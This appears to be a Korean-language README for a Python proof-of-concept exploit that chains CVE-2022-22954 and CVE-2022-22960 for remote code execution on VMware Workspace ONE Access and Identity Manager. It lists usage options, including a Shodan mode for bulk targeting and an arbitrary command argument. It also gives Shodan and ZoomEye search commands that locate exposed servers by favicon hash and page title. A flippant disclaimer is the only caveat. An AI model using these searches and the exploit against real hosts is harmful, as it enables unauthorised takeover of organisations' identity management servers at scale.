
CVE-2022-22954를 악용한 후 CVE-2022-22960을 악용하는 Python 스크립트
VMware Workspace ONE Access 및 Identity Manager에서 SSTI를 통한 RCE.
CVE-2022-22954 - PoC SSTI
사용법:
CVE-2022-22954.py [-h] -m SET_MODE [-i IP] [-c CMD]
optional arguments:
-h, --help show this help message and exit
-m SET_MODE, --mode SET_MODE
Available modes: shodan | file | manual
-i IP, --ip IP Host IP
-c CMD, --cmd CMD Command string
이것은 단순한 PoC입니다. 본인의 책임 하에 사용하시고 프로덕션 또는 실제 환경에서는 사용하지 마십시오. 코드가 왜 이런지 또는 좋은지 나쁜지 묻지 마세요. 저는 신경 쓰지 않습니다. 저는 멋진 프로그래머가 아니며 제 코드는 지저분합니다.
zoomeye search 'iconhash:-1250474341' -num 780 -filter=ip,port
shodan search "http.favicon.hash:-1250474341" --fields=ip_str,port --separator ":" --limit 1000 | grep ''
shodan search 'title:"Workspace ONE Access"' --fields=ip_str,port --separator ":" --limit 1000 | grep ''